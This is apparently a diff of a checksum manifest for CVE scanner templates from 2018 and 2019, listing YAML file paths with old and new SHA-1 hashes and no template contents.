+http/cves/2018/CVE-2018-11409.yaml:6a4092b60a8e09019a0b5c8d263ad8a26f3631dd +http/cves/2018/CVE-2018-11473.yaml:69638aa8a17e8bf9285d88ec0100bd69c36987a6 +http/cves/2018/CVE-2018-11709.yaml:41665abe4890a3b6a73e6019aa9caa22364280ad +http/cves/2018/CVE-2018-11759.yaml:3a5574ca3617542788df6812fb710bbf37cfc098 +http/cves/2018/CVE-2018-11776.yaml:be84324e3b216b65994af263fe66173838e1f212 +http/cves/2018/CVE-2018-11784.yaml:f978f633c1ace52039333d342a53302e110e183a +http/cves/2018/CVE-2018-12031.yaml:535cbea2cfbdae172d980a0433cb660415257246 http/cves/2018/CVE-2018-12054.yaml:4bd015a55fedc7b0cf898eaf9a3049aad883ac05 http/cves/2018/CVE-2018-1207.yaml:d725ed522674e6fe25fe4a413ecba7fe32a1b864 http/cves/2018/CVE-2018-12095.yaml:7c6d4a16cc5c42673c2f23abb768466b6164d306 -http/cves/2018/CVE-2018-12296.yaml:81c4449cad426deb65bea9c7f88c347ab742d580 -http/cves/2018/CVE-2018-12300.yaml:f36058d3e5f3378793aa6cbf9fba01c8f3f31aff -http/cves/2018/CVE-2018-12613.yaml:20b01be7333db300b27d0446c0978cabd9707a0a -http/cves/2018/CVE-2018-12634.yaml:8c012f3c4b96c0a9e84395277b16cf1228b3b3d3 -http/cves/2018/CVE-2018-12675.yaml:300d9fe96c71039c79c7413cc169996b23f2229c -http/cves/2018/CVE-2018-1271.yaml:32e25597cdb4409a6316b4cf6dcb8c7ee47f8981 +http/cves/2018/CVE-2018-12296.yaml:8624bcc28a481bf2535cc047138dbf99a97059ea +http/cves/2018/CVE-2018-12300.yaml:99e1abfc6ea6de4f0699fab1122ff20851681934 +http/cves/2018/CVE-2018-12613.yaml:7fe270962d84ef0e3b411c4c4b5ba4f1aa1a1a5c +http/cves/2018/CVE-2018-12634.yaml:dd631be288be4040ece786fb77e56f085f4359fd +http/cves/2018/CVE-2018-12675.yaml:2b74ddc9e7457002f67d3a52276d1e18b2611ff7 +http/cves/2018/CVE-2018-1271.yaml:def7079fda8992783a771bb074e292b823f826c8 http/cves/2018/CVE-2018-1273.yaml:51f89909ec1b94e979c85d95d7bdc5797fbf8606 http/cves/2018/CVE-2018-12909.yaml:e3190dfe0c8354393d283dc3bbe60b472953e024 http/cves/2018/CVE-2018-12998.yaml:47f498dbb37559c753c8fac62600c63ff9a9c791 -http/cves/2018/CVE-2018-1335.yaml:6ef3bfadce1fcdd974ba24d212051e01b43ccbf7 -http/cves/2018/CVE-2018-13379.yaml:527a98b1ac31c5b6be0cb0b6580a53e7c768f872 -http/cves/2018/CVE-2018-13380.yaml:4e658359e0578a268129777aceacfdca08cd0e94 -http/cves/2018/CVE-2018-13980.yaml:0a81dc6b2ec1918e8b6ff9a0f52b720c97a32d5e -http/cves/2018/CVE-2018-14013.yaml:ec9dd4858dd85058fb9e5a81219ff2a54fc6987c +http/cves/2018/CVE-2018-1335.yaml:603d12a7eb5a2415e5d67e27eb4299722131310e +http/cves/2018/CVE-2018-13379.yaml:f4abeb12dd4cc5a62fbb1a6cea10090e265f2fb2 +http/cves/2018/CVE-2018-13380.yaml:8734feef8b6a70208db1067f8b6cd9a7f3db74dc +http/cves/2018/CVE-2018-13980.yaml:7d2ea83edff58f4023bfc2103a74e1fcecb6540e +http/cves/2018/CVE-2018-14013.yaml:2193441a1af6243edc682037946f8d4ce4ce400c http/cves/2018/CVE-2018-14064.yaml:cccc793c46719cb2a7e81374f651331c60a7890b -http/cves/2018/CVE-2018-14474.yaml:8f686d3bf853b49a404a5c5a1284af902f0b0c3c -http/cves/2018/CVE-2018-14574.yaml:6c396f30ec5c31d76ad7b4e3de1d4d894c87ea03 +http/cves/2018/CVE-2018-14474.yaml:1a6a7c21e82b7d962e5394b5bfa2582ff74885d0 +http/cves/2018/CVE-2018-14574.yaml:d93505082cac96cda4c20d151d07985e81e550b4 http/cves/2018/CVE-2018-14728.yaml:3005fff6268e3e0079028fc907bcad293f3d69fa -http/cves/2018/CVE-2018-14912.yaml:cfafc16d11a1025dfcc32d6469c744a5feea4b66 -http/cves/2018/CVE-2018-14916.yaml:6887d4ce26a0ecc4735fc4c5d8f37637eea93630 -http/cves/2018/CVE-2018-14918.yaml:205df3e7d32d50a784be380c63299e602696d477 -http/cves/2018/CVE-2018-14931.yaml:a7fcc8eec961c5072b49b17567b2be191c291ceb +http/cves/2018/CVE-2018-14912.yaml:2e747fd7af4ad0250013a6a968dc2409c9eb5beb +http/cves/2018/CVE-2018-14916.yaml:99366bc99fc0a290c76a8719866cd70af5132ffd +http/cves/2018/CVE-2018-14918.yaml:3337bed476d83b757d2a50868709dfb6d4265730 +http/cves/2018/CVE-2018-14931.yaml:aec3137733c19a46022e5e0158bfe0e57270a3fd http/cves/2018/CVE-2018-15138.yaml:73e253bb1cb6ea31e6a7e7be8c2486bf196671b2 -http/cves/2018/CVE-2018-15517.yaml:4b7560808f5e4dd8b12c2f82a6e8192884fc7131 -http/cves/2018/CVE-2018-15535.yaml:ea49358065dfc654a86b457abc330e8f3920cda1 -http/cves/2018/CVE-2018-15745.yaml:a8a8906f49938d40889e4eb1b783485da29dcab8 -http/cves/2018/CVE-2018-15917.yaml:f61fed939dd94d4879d745b667cc88305d0d09d8 -http/cves/2018/CVE-2018-15961.yaml:0e839c00023977ea5bbb312668d978924ad24ffd +http/cves/2018/CVE-2018-15517.yaml:23862903157263d68ee6212e53179f5172736730 +http/cves/2018/CVE-2018-15535.yaml:761f13a32b66cba3c805330fda03b152b374b2e0 +http/cves/2018/CVE-2018-15745.yaml:2893ecc4d1961e2138fe090242ff7e3b54951472 +http/cves/2018/CVE-2018-15917.yaml:83c37ef685d12355a32e18120c9ec156909926f9 +http/cves/2018/CVE-2018-15961.yaml:4def13527ee22108d3eb74d5e1eb9399a0140e42 http/cves/2018/CVE-2018-16059.yaml:992cc116f8f261abd69f4cb5b9934ce00d83e8e0 http/cves/2018/CVE-2018-16133.yaml:c01d3089c2ebbe72dfe0e54eb3e5c8626e19d362 -http/cves/2018/CVE-2018-16139.yaml:4a8ca0cf9ad80535057486bf695b3aadb02b20b5 -http/cves/2018/CVE-2018-16159.yaml:a82ccba80bd4d66e5237acf576666e62982ab6fb -http/cves/2018/CVE-2018-16167.yaml:0b3462ffa9b1c587834736d23ae699dacd58a194 -http/cves/2018/CVE-2018-16283.yaml:5390db52ec1a7cfc91eeb714a2ea60bdf8cc48e9 -http/cves/2018/CVE-2018-16288.yaml:cb8ed921a27e6383233a9db2cb92fd042baf8191 +http/cves/2018/CVE-2018-16139.yaml:e847bfca654dd23d574dbfe531b0a691cdcf56f6 +http/cves/2018/CVE-2018-16159.yaml:5b61de6617d5074efccf89df22d81ae7c7c8105f +http/cves/2018/CVE-2018-16167.yaml:f66679c3b289f3e28320055463f4f716317a2c1d +http/cves/2018/CVE-2018-16283.yaml:8a7a91b6b81b9d73042d3199b76a96d594fab657 +http/cves/2018/CVE-2018-16288.yaml:ef5d6815cfe1919acf321f56af943934b95c1baa http/cves/2018/CVE-2018-16299.yaml:b020da11f05eaa7a8b9eb2136b09cf8190b0b59c http/cves/2018/CVE-2018-16341.yaml:74ccee29760fe9aaf2616353755ab249f6f6fcfb http/cves/2018/CVE-2018-16668.yaml:48491a4b2add544918c03545451fc5ee424330f3 http/cves/2018/CVE-2018-16670.yaml:c346dc7a3d1df2c12c8f5f1afb69a09c1d785c9a http/cves/2018/CVE-2018-16671.yaml:906368ef356b2b4c8965f8046fd49dbef0dd821f -http/cves/2018/CVE-2018-16716.yaml:a1f2d156568e8a37a17de9a2759623c13ba02f41 -http/cves/2018/CVE-2018-16761.yaml:dbdf46a59546a320d395c2436fbca07cc9c1be86 -http/cves/2018/CVE-2018-16763.yaml:804e34994429a56b36f2447a635c4bdc5dd59a07 -http/cves/2018/CVE-2018-16836.yaml:98b608b7b785160c1ca398b8ccf5457933dafcbc -http/cves/2018/CVE-2018-16979.yaml:94bde7048fe9f62210ccb11497dbc11e1c3b1c99 -http/cves/2018/CVE-2018-17153.yaml:e004a49d22b96f5006592b6000346b3c51b7c321 -http/cves/2018/CVE-2018-17246.yaml:22c110b22233af042e989536ce8b723547993e00 -http/cves/2018/CVE-2018-17254.yaml:796bc823bb38f76e61b2c6a7b8d508a6a81a1cb8 -http/cves/2018/CVE-2018-17422.yaml:90edc0d3636a6670e628eccc7eea61be4144918b +http/cves/2018/CVE-2018-16716.yaml:c4e7b7d3daee903a199b68d440c6e41525746037 +http/cves/2018/CVE-2018-16761.yaml:4a6d90b317f11da3befdef5b89e497ce7876426b +http/cves/2018/CVE-2018-16763.yaml:f29c6f637d2868e53c10e7c2522b36b40842b00e +http/cves/2018/CVE-2018-16836.yaml:ceafe25bf42e256f10b38e6151c2c7a764259fa5 +http/cves/2018/CVE-2018-16979.yaml:0ecee03cdd86c219e76cfaeff5740908f61b5b4c +http/cves/2018/CVE-2018-17153.yaml:fed4c12e76a4a9c36932f7ca3effaeec9563db62 +http/cves/2018/CVE-2018-17246.yaml:5ebc30e64db945afbd0db95bf9bf73059e81752a +http/cves/2018/CVE-2018-17254.yaml:61a5b750c1409ce5d1b79c8859212fd4bcac1467 +http/cves/2018/CVE-2018-17422.yaml:2f9d775f67d43eecf8d145ffd01aed37075356bc http/cves/2018/CVE-2018-17431.yaml:4f724c2ec11d7e5574b913c8f3d171dc69bf23d6 http/cves/2018/CVE-2018-18069.yaml:fb55c1c8a6544261d3da494f50ffe75d12262d5c -http/cves/2018/CVE-2018-18264.yaml:60ce8b84365948ec6e4225928dd0c460f0d07cfc -http/cves/2018/CVE-2018-18323.yaml:de7bca30fc594d2a64c3cbd1290e7c06ea6a586e -http/cves/2018/CVE-2018-18570.yaml:ccadef30f166b018d3c6b6191d6469b4b87d7d3a -http/cves/2018/CVE-2018-18608.yaml:6b07f6e0ac8275789cd298b92273b007fb0137fe +http/cves/2018/CVE-2018-18264.yaml:e49855501e1ea92e2e18f03868942e2be2075e2c +http/cves/2018/CVE-2018-18323.yaml:49ada4a8a0e4a8a1cdc9f8d6fb5a2f3b801c5e14 +http/cves/2018/CVE-2018-18570.yaml:1eeeb647ad50a374103212462630e86944fcc129 +http/cves/2018/CVE-2018-18608.yaml:c9faa9dee45e2512ccbe1891582889f90ab4f752 http/cves/2018/CVE-2018-18775.yaml:6855fbb7653fb75ebfb58a92e13a94bddd6363e7 -http/cves/2018/CVE-2018-18777.yaml:187888ecf9a654e21ab7d5ff2705080de8c592ff -http/cves/2018/CVE-2018-18778.yaml:453874de53580b3303492f809be7b47d244ac9e5 -http/cves/2018/CVE-2018-18809.yaml:a2e9673355eb887dd72422a1e1ba57fcc1544381 -http/cves/2018/CVE-2018-18925.yaml:b111c828cbe0924cf80c4f9f5c1692e2f4c86b74 +http/cves/2018/CVE-2018-18777.yaml:ba4f0ce809e6bbf9633df218956f1b0cc2842bfa +http/cves/2018/CVE-2018-18778.yaml:137375a1f30ee0567998a4c4a609986093bcefde +http/cves/2018/CVE-2018-18809.yaml:39b8141f44a0ee669fdb7e35058f7c6ff3541fc9 +http/cves/2018/CVE-2018-18925.yaml:21c1e900a4b8a05b95c2f0f557379654ae498afd http/cves/2018/CVE-2018-19136.yaml:2cdceec8a347290659292d34e7f91f97f8e8671e -http/cves/2018/CVE-2018-19137.yaml:c2a6ba3d5e9b9e99a92af146ad5bfaf069bb5bbd -http/cves/2018/CVE-2018-19287.yaml:33b653d7730b28e8c86a70361cae669c6bb2b6bb -http/cves/2018/CVE-2018-19326.yaml:0af737b4f5788ffc62e2be1d4f3344ba6317cc0d -http/cves/2018/CVE-2018-19365.yaml:fbd77bc5cd41e696ac6a62af480daed27878502f -http/cves/2018/CVE-2018-19386.yaml:c413cba84837a70cc0a945b5fcdc6977084bfaa2 -http/cves/2018/CVE-2018-19439.yaml:643d392bcd2fe56e8672a9e3c6eba7795f09164f -http/cves/2018/CVE-2018-19458.yaml:4d892098268e9f256ed952ecfa4fd1928c5e664f -http/cves/2018/CVE-2018-19749.yaml:0ba1c203a55503618da056f2c3fded226e1ffd8c +http/cves/2018/CVE-2018-19137.yaml:fd1ff8c639e0ca4f776bbbd0238ca952db2985b1 +http/cves/2018/CVE-2018-19287.yaml:0a56cc461952fb23c4221d0aa334d5464bcf0d36 +http/cves/2018/CVE-2018-19326.yaml:8925ef0ecd6f677aa71bed2457d2f6114a3561dc +http/cves/2018/CVE-2018-19365.yaml:a8399476bc01fdd26608698aae3a117b711b1243 +http/cves/2018/CVE-2018-19386.yaml:2d44c5a61bb7061ad629e54b380561de2a35d38e +http/cves/2018/CVE-2018-19439.yaml:93557a94ecca5127e7adf1697cc5946754c64a21 +http/cves/2018/CVE-2018-19458.yaml:9a1c4ed1055bce227a906e29f4487473d6598c49 +http/cves/2018/CVE-2018-19749.yaml:6cd5dc9be2d13dc800a9ca4f6089838404803360 http/cves/2018/CVE-2018-19751.yaml:41a013ed8f511aaea82081e075916ed638b1ebab -http/cves/2018/CVE-2018-19752.yaml:e9439a1168e9ece18de6d17efee8c21b56c09b0d -http/cves/2018/CVE-2018-19753.yaml:15fa9cbdabde52665fc9494ad11b3d96c828fb76 +http/cves/2018/CVE-2018-19752.yaml:e3d17d1b2dea369da7e33fa13dcf56bb79d148de +http/cves/2018/CVE-2018-19753.yaml:1d0baa4a16b3ec969135a6dc642de67c854ec3a1 http/cves/2018/CVE-2018-19877.yaml:31aa058606935cc5babf7d592f92f87aeaf162ec http/cves/2018/CVE-2018-19892.yaml:b0823b9b53093ad710fc09dbdb2e78790f92a200 -http/cves/2018/CVE-2018-19914.yaml:0066fbbaaecd93a5331533ce5250f9f1cdc88bb1 -http/cves/2018/CVE-2018-19915.yaml:74c1d616359bb3b0d408eaa0788a481cfef9f3ef -http/cves/2018/CVE-2018-20009.yaml:a08180dd2954ea56039884a9d9ed6ca8592fe726 +http/cves/2018/CVE-2018-19914.yaml:08e33fa9f1fc8a7d48bfc23e9abb3401f0a7eefb +http/cves/2018/CVE-2018-19915.yaml:2c6e0242cea923049907f76a74b85edfab5183eb +http/cves/2018/CVE-2018-20009.yaml:975ad7802a4b86368020631067f9a6ddd0783d48 http/cves/2018/CVE-2018-20010.yaml:ec78911a377dfae9ce54f561a7d71ba449a741dd http/cves/2018/CVE-2018-20011.yaml:98950dff4dbf42b3759537438082d4166c789270 http/cves/2018/CVE-2018-20462.yaml:70faa7b267536593d4b33427ff677d12deb57cce http/cves/2018/CVE-2018-20463.yaml:9712578b99f890b278c05e83cce8bf9ab31cf93f -http/cves/2018/CVE-2018-20470.yaml:b5e4fedc8ecb0a2f546ceb1cb8a7d7335b5c2915 -http/cves/2018/CVE-2018-20526.yaml:34bd41e9b50ba58581afa0dd6afae67c646b6085 +http/cves/2018/CVE-2018-20470.yaml:f64b036510d604de04aaf2db6996aa9a248be4b0 +http/cves/2018/CVE-2018-20526.yaml:bdbb51d1ffa66cebc0ae6e78cf40726e8f97a2d9 http/cves/2018/CVE-2018-20608.yaml:92c17d1974d5042e036f5bfebf8cb2b0fe669c34 -http/cves/2018/CVE-2018-20824.yaml:92f8a7591aa28384815ed06260df69c2a947a7b3 -http/cves/2018/CVE-2018-20985.yaml:194458d057278f25bcebeb4295bfc1e75e22e2a8 +http/cves/2018/CVE-2018-20824.yaml:e9c7b19a982fdbc77a7a6e97718392b2c6fbab01 +http/cves/2018/CVE-2018-20985.yaml:6e840038e5ef9a5d859f4d668036d2121b3fac40 http/cves/2018/CVE-2018-2392.yaml:b0dfd0dc15a700e7739aaea55f5d5aa6fb45b61c -http/cves/2018/CVE-2018-2791.yaml:7c3a36e0a4569d572ebc6c68a27c05ba9954c4b6 -http/cves/2018/CVE-2018-2894.yaml:0200e340681ab7d80a4a65e7f68fee290e1b4660 -http/cves/2018/CVE-2018-3167.yaml:eb966a0c17861aad5f5880be966f81db060f622a -http/cves/2018/CVE-2018-3238.yaml:77bacb539f3e9165aee40b9ea3121c3515493ea1 +http/cves/2018/CVE-2018-2791.yaml:ec08db845d506ea70eef8190ff46cfbc3ddb4d06 +http/cves/2018/CVE-2018-2894.yaml:f262fb833059893aa4a51846e7312e53cf8844e7 +http/cves/2018/CVE-2018-3167.yaml:273f69df618572a6af4c29fb49751377ba38195f +http/cves/2018/CVE-2018-3238.yaml:5030ec913ae838ffaf3b60ca7be68a434aff3bbe http/cves/2018/CVE-2018-3714.yaml:467fa520a83d33a07e51718f5bcb3c358beea1d4 http/cves/2018/CVE-2018-3760.yaml:90f7093f1e64c13dea1afaee2fe85b1fcef938ff http/cves/2018/CVE-2018-3810.yaml:2d56de0a9b2c76b6aad57d50302dbcf26a90e6b2 -http/cves/2018/CVE-2018-5230.yaml:cb5fee3f952822eb41503ed9e0ccfabcf11dbb4e -http/cves/2018/CVE-2018-5233.yaml:3e16ec605d22bdd1ef14d5d40be4c53b357bea60 +http/cves/2018/CVE-2018-5230.yaml:65c5eec3102fa06c52d29003683038ce945e7a29 +http/cves/2018/CVE-2018-5233.yaml:2810f960e2057833a3a224cc7cf41556f23a6a2b http/cves/2018/CVE-2018-5316.yaml:fe0e4112fa6a7f2918925dff5501b19680026501 -http/cves/2018/CVE-2018-5715.yaml:f3a7af05fa105dad10138b02f1c8fb0a4ecf3844 -http/cves/2018/CVE-2018-6008.yaml:14a67d10116ce31b085da9f244055d8f25983b01 -http/cves/2018/CVE-2018-6184.yaml:967c0a9b8cf7387710b3441ce7adf1ce9fcb7ff6 -http/cves/2018/CVE-2018-6200.yaml:ba9654d3be7c6f1bd0f84f570cc71d7e57310c0b +http/cves/2018/CVE-2018-5715.yaml:1c44d1785af1d90a1bf56c7d71710399f35ef6c4 +http/cves/2018/CVE-2018-6008.yaml:34f83b3b57e8d26d90647da2d70c4e7b7dd60380 +http/cves/2018/CVE-2018-6184.yaml:fc991ad3b4fc4ef0b2c379ec4795279b8b806f77 +http/cves/2018/CVE-2018-6200.yaml:dfead2b2caa43616b1debefbee4bf46566978351 http/cves/2018/CVE-2018-6530.yaml:a7ec85a12911cc378322baaa7a1912ca731ce631 http/cves/2018/CVE-2018-6605.yaml:9395411144d77cf69a9f241d6eac574be3803a3a -http/cves/2018/CVE-2018-6910.yaml:903ae5c396c04f04daf9053c58ea654f1963a26b -http/cves/2018/CVE-2018-7251.yaml:8515839e33ecc2baa648b143df5e68c105076f14 -http/cves/2018/CVE-2018-7282.yaml:8cd1e4ec21b036d28a97b466f79fcbcc690be192 +http/cves/2018/CVE-2018-6910.yaml:5cdd602b4a3ee04e69fd5bb65014b372ffd67e77 +http/cves/2018/CVE-2018-7251.yaml:3173253cec72ee76a5cb9d69a05f0339ee638caa +http/cves/2018/CVE-2018-7282.yaml:322b1e3e3ceb2f4b4c37b987be40cf148fbe1b61 http/cves/2018/CVE-2018-7314.yaml:bd70e733cbf74d122f249c148b42dab8ddacb60f http/cves/2018/CVE-2018-7422.yaml:e3c039258631c4bcd6be9a250683a659c30589e4 -http/cves/2018/CVE-2018-7467.yaml:87b61f122cb41ca9623cb6f8edcf80c468cad161 +http/cves/2018/CVE-2018-7467.yaml:714eccac0c1d375748ece0da2b87c68d27a461bd http/cves/2018/CVE-2018-7490.yaml:569286ff6beffe744aed0915b8d887e6921ee84b -http/cves/2018/CVE-2018-7600.yaml:9850afff4f55906fb1139177e9e3dbfa61ebefb1 -http/cves/2018/CVE-2018-7602.yaml:47454a60cd6aa10c718354b44932d1998e64beb0 -http/cves/2018/CVE-2018-7653.yaml:47938eaeab1aabf7c180a3e5171365fa5b74d912 -http/cves/2018/CVE-2018-7662.yaml:692f642bfb1c0cdb4d9dd8c2ad2f486b1c5af476 -http/cves/2018/CVE-2018-7700.yaml:f2883ec987ddc4aa27c177d6dcb4ef196c6392c3 +http/cves/2018/CVE-2018-7600.yaml:3d30ed4f3a3f787ed1a31a95852b86bcabafc09a +http/cves/2018/CVE-2018-7602.yaml:9528f0b81c634579fb58bf3feb93049ed6deac9b +http/cves/2018/CVE-2018-7653.yaml:d52e4702df453fcf5b2a641b564ada02cdc1f32e +http/cves/2018/CVE-2018-7662.yaml:d8f5272bb557b3f06386824fbd5ad3ac6d91f62f +http/cves/2018/CVE-2018-7700.yaml:339dc5c02de55e6e0589ac79da7425a56064185c http/cves/2018/CVE-2018-7719.yaml:47cab26137d85e8909949d13e765303fb157f35e -http/cves/2018/CVE-2018-8006.yaml:331b768d2e3fd9d5cdb64555452676db917d8150 -http/cves/2018/CVE-2018-8033.yaml:ffc9de217255a3b489ed7827f6d32a5947300261 -http/cves/2018/CVE-2018-8715.yaml:bdd0071830ede0ea7b268e3849730c8f57da3fd2 -http/cves/2018/CVE-2018-8719.yaml:346b89bd3df6b1c410ba889896c885c632bc89fd +http/cves/2018/CVE-2018-8006.yaml:11820c48004a18fd909fa35b6022d85c9203a9b8 +http/cves/2018/CVE-2018-8033.yaml:ed36027558a45eb525720fa1f9b07b85f65d2a05 +http/cves/2018/CVE-2018-8715.yaml:845d59d1e0942c3760c2d843b177157d5b31da54 +http/cves/2018/CVE-2018-8719.yaml:bfb5ceeb330f74172c117e625fe69e8e10197361 http/cves/2018/CVE-2018-8727.yaml:fc1c33f0a40fc19bbd5c77e8bc0a71e35d54e56d http/cves/2018/CVE-2018-8770.yaml:697c1ba6a15230f9f9f2ce2899ebefc4fc0ef068 -http/cves/2018/CVE-2018-8823.yaml:6240e96de514f9aba1a81835c2dbd5832e3452c0 -http/cves/2018/CVE-2018-9118.yaml:99050c924069419c5734ad95f623efc6fc3fb2b5 +http/cves/2018/CVE-2018-8823.yaml:841bfa50c0524f4b3dea7995e28c5c314b15ac27 +http/cves/2018/CVE-2018-9118.yaml:7bf016eaceeefb7d38e88c7841928d26f601f581 http/cves/2018/CVE-2018-9161.yaml:f98357d745d30e54b9a0f949e05f38ae29148319 -http/cves/2018/CVE-2018-9205.yaml:1ad420199050d8151ceeed0158f0cc65e8a0d83a +http/cves/2018/CVE-2018-9205.yaml:ddc94395c8fd94dd7f3dfd5d521c88d2a18d1293 http/cves/2018/CVE-2018-9845.yaml:1d90b0a63da858688c950787f350bc620243c869 http/cves/2018/CVE-2018-9995.yaml:1acb8eb87312ef544059faa23df771316f81e41d -http/cves/2019/CVE-2019-0193.yaml:c7c29ec1c5146f4916c248baf33d35ec1ee897c1 -http/cves/2019/CVE-2019-0221.yaml:b250817b2755dfd6fb5b5549a57c64be696104a8 -http/cves/2019/CVE-2019-0230.yaml:c47d5979ba20771e55d02d06c0388a37d96774f6 -http/cves/2019/CVE-2019-10068.yaml:ede57fa772e37d944b2bbad95dff4aed5fdeaaf6 -http/cves/2019/CVE-2019-10092.yaml:b2e3395199c7f0544ed32a952fbea0ab78c1d6b6 -http/cves/2019/CVE-2019-10098.yaml:188c8d293a7ac0eda5d9399830acd7949730cc5a +http/cves/2019/CVE-2019-0193.yaml:1315152b6f01340007acd5426780992d9823ce27 +http/cves/2019/CVE-2019-0221.yaml:58497e316e0aa43087705825cf0b213ee8d13d21 +http/cves/2019/CVE-2019-0230.yaml:e303dedee56203e94933d761fc9ffd427f22b090 +http/cves/2019/CVE-2019-10068.yaml:372682e6aa3ccb83aaf474bccba5f4b103796745 +http/cves/2019/CVE-2019-10092.yaml:d9d774da89cff5cf78b56c38b569f2a093dab139 +http/cves/2019/CVE-2019-10098.yaml:5295a08794823dd689b4a8597f5d10f51191197f http/cves/2019/CVE-2019-1010287.yaml:cec033f9ac31aaf83bd80c9279ab5a7aed4b890a -http/cves/2019/CVE-2019-1010290.yaml:2491cf2d232dd906a98fbe5642dcbae2cf9e8dda +http/cves/2019/CVE-2019-1010290.yaml:fd5a6b728a89be5e21149ba9b9ddf9fd0add141d http/cves/2019/CVE-2019-10232.yaml:713f169c89ece5300e52e0bc987370371d9b3573 -http/cves/2019/CVE-2019-10405.yaml:d46cee080fd6b0439f42fa434811a990dc4c7a5f -http/cves/2019/CVE-2019-10475.yaml:fe98ab90766e49a8318e08eb2b785a538c4b54e1 -http/cves/2019/CVE-2019-10692.yaml:33c3a322fe78f5333c349ed4cfdd73eeaf02c4b6 -http/cves/2019/CVE-2019-10717.yaml:97a42e7d0d8d70011f73b784cf7ed1461d082819 -http/cves/2019/CVE-2019-10758.yaml:027f21cba689be168dde776353ca21ed461b7ecb +http/cves/2019/CVE-2019-10405.yaml:9c26c8436451083f65afdc4c91524a483af73c8e +http/cves/2019/CVE-2019-10475.yaml:4a159a11f75f8e287a519514c93eb55af3a1173b +http/cves/2019/CVE-2019-10692.yaml:b6b4abd2fcde505f79a4b4c2c942ed242d967edd +http/cves/2019/CVE-2019-10717.yaml:087d9a5aa47b927d396fc4b7752b03de3782ebbf +http/cves/2019/CVE-2019-10758.yaml:3a79381a7eeb08f38bd8f5f6c862fc7c1f05c5d6 http/cves/2019/CVE-2019-11013.yaml:2ad66e116c4d085161542c51376f4c68df78c478 -http/cves/2019/CVE-2019-11248.yaml:e513466e6a8225282d03a52e95aac657c3635801 -http/cves/2019/CVE-2019-11370.yaml:b1afe7865d4f77c2faab385d378e05cf751abe95 -http/cves/2019/CVE-2019-11510.yaml:ea7827a092876f789f83de6dd697bcf94600548d -http/cves/2019/CVE-2019-11580.yaml:bd10ff77f8580bb8646fb88dc4f4182b3ffb2aa8 -http/cves/2019/CVE-2019-11581.yaml:28960518b8b5a5994bd2d4c9af1abab769731c1b -http/cves/2019/CVE-2019-11869.yaml:93e7f80a12230e015d74027c713eee71c5590bfe -http/cves/2019/CVE-2019-12276.yaml:c3bdc5c82f72ba0c13f88a08f95e3723c78a1c5b -http/cves/2019/CVE-2019-12314.yaml:527325ce98178f09e5924d54b9da59840ecff8ff -http/cves/2019/CVE-2019-12461.yaml:6676099ce71d856e2cf5cd1added94e71187cc53 -http/cves/2019/CVE-2019-12581.yaml:2e14cefaf11f6357909c51c0f04751f11dabf1e3 -http/cves/2019/CVE-2019-12583.yaml:5508d09c101b84a227a291643bf3ac2d397c1c8b -http/cves/2019/CVE-2019-12593.yaml:771cf4be64480ac1c69fd930caeb8b3600c80fd1 -http/cves/2019/CVE-2019-12616.yaml:a6b7ecc16eb77ea1b79242b08b0c0ec39f44246f -http/cves/2019/CVE-2019-12725.yaml:c36c20e3da08dde916d4f66e398ca9e7d3d3ffd0 -http/cves/2019/CVE-2019-12962.yaml:f6d0a88bbb503a2dd35e432316c8135560653fc9 -http/cves/2019/CVE-2019-12985.yaml:c26aca95af03c4210d31919266ce3fdefd93f2dc -http/cves/2019/CVE-2019-12986.yaml:1fa79618b0b2d1c242827287d0654fe1c3c0e352 -http/cves/2019/CVE-2019-12987.yaml:a9cddb20e5ba61ad1bc2f9c5e77c82298128e116 -http/cves/2019/CVE-2019-12988.yaml:03a311fa57658b1a5a89db828a3086203d96e8ea -http/cves/2019/CVE-2019-12990.yaml:91a4855399327e0cbda984159a1d60065c0b11ab -http/cves/2019/CVE-2019-13101.yaml:2f3f80e7abb91b1ba7f931deeea7370758f573c4 -http/cves/2019/CVE-2019-13392.yaml:24ece9b94191ef8f7e73dd0ce9437291823e8ae1 -http/cves/2019/CVE-2019-13396.yaml:9d5455cc901f005e72fdcfeb31551a05fcf4c240 -http/cves/2019/CVE-2019-13462.yaml:20f3e07c707031e0ff23785c1cf5b2a8da67dd25 -http/cves/2019/CVE-2019-14205.yaml:15701d3bd55fccb335fdd621d141bcf61d0d35f8 -http/cves/2019/CVE-2019-14223.yaml:46c68bd0548a57887393c5fe289c29a58a81a853 -http/cves/2019/CVE-2019-14251.yaml:87a40374483653f3b24d40ee8c36cb8b9da1001a -http/cves/2019/CVE-2019-14312.yaml:917f09b53b496e106194444088de1c3b05a1fda8 -http/cves/2019/CVE-2019-14322.yaml:a5f9ac480498a1eac7251123ba3589ff1948eb49 +http/cves/2019/CVE-2019-11248.yaml:5124a8a18753e96e412cceb36a590249f61fc296 +http/cves/2019/CVE-2019-11370.yaml:df484ba9eda9562fce57052043fe7e6bcc20c892 +http/cves/2019/CVE-2019-11510.yaml:37ce5da29efdabcad9bbe9ed562d39ff4af92988 +http/cves/2019/CVE-2019-11580.yaml:0960dfb042ac587bf860280f1c682f7c95ebc4d8 +http/cves/2019/CVE-2019-11581.yaml:f29ac5a617fd6582e8416d89f0e96fc75fee02fd +http/cves/2019/CVE-2019-11869.yaml:554296f0a9b3b597f433271e96c94945b1a1e2eb +http/cves/2019/CVE-2019-12276.yaml:d46baca1545e6e8549012c7397daf86a7a6b23e4 +http/cves/2019/CVE-2019-12314.yaml:b86487969cfe1c1e84e842d93a500fb71e3964fa +http/cves/2019/CVE-2019-12461.yaml:3068bf62d30fc8534e65663178590794413f5aaa +http/cves/2019/CVE-2019-12581.yaml:6543be0bceac3b6b2e2f725167baeacccc790117 +http/cves/2019/CVE-2019-12583.yaml:ea1f2ee731644d9b9ff35227124b5f9deedc57ff +http/cves/2019/CVE-2019-12593.yaml:73dc1dd1b2adcf7e32f17dfd589b907e7b9856c5 +http/cves/2019/CVE-2019-12616.yaml:cb73607b6fa9ebb0e404e6fd23a996b5f567a2d4 +http/cves/2019/CVE-2019-12725.yaml:ed7b7dd0f24be6fc9e460590f4ed3cab3430b5c1 +http/cves/2019/CVE-2019-12962.yaml:4799a7b0f606ddb24efafe013cff6f4993535b96 +http/cves/2019/CVE-2019-12985.yaml:014126b5bea9dec1b4e8f11d2ae3b711f037b376 +http/cves/2019/CVE-2019-12986.yaml:05937e0d453d00b1c43afd669e3774b7d5bf06a4 +http/cves/2019/CVE-2019-12987.yaml:282eff1208d350bf7bebfa8827f318c133bb66c9 +http/cves/2019/CVE-2019-12988.yaml:197577eac25a532f0584f5822f1c60392d838f05 +http/cves/2019/CVE-2019-12990.yaml:9e48d7926d2162a4aef49feac4d58cd390d04f82 